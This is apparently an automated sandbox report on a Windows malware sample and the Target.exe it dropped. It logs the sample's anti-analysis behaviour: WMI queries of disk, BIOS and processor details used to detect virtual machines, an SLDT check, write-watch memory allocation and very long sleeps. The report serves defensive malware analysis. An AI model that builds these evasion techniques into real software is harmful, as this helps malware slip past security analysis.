Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

System information queried: FirmwareTableInformation

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Memory allocated: 1DFA7BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Memory allocated: 1DFC1510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory allocated: 1D099EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Memory allocated: 1D0B36C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Memory allocated: 2A5B9950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	Memory allocated: 2A5D3550000 memory reserve \| memory write watch	Jump to behavior

Contains functionality to detect virtual machines (SLDT)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe

Code function: 1_2_00007FFD9B8B31D4 sldt word ptr [eax]

1_2_00007FFD9B8B31D4

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199955	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1199718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 1198910	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 599886	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 599777	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598871	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598761	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 598652	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 597708	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Thread delayed: delay time: 597543	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Window / User API: threadDelayed 3692			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Window / User API: threadDelayed 6002			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\zlONcFaXkc.exe TID: 7336	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59871s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -58999s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7388	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -1199955s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -1199828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -1199718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -1198910s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -599886s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -599777s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59867s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -119500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59529s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59287s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -598871s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -598761s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -598652s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59840s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59733s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59379s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59261s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -597708s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -597543s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432	Thread sleep time: -59859s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7920	Thread sleep time: -30000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
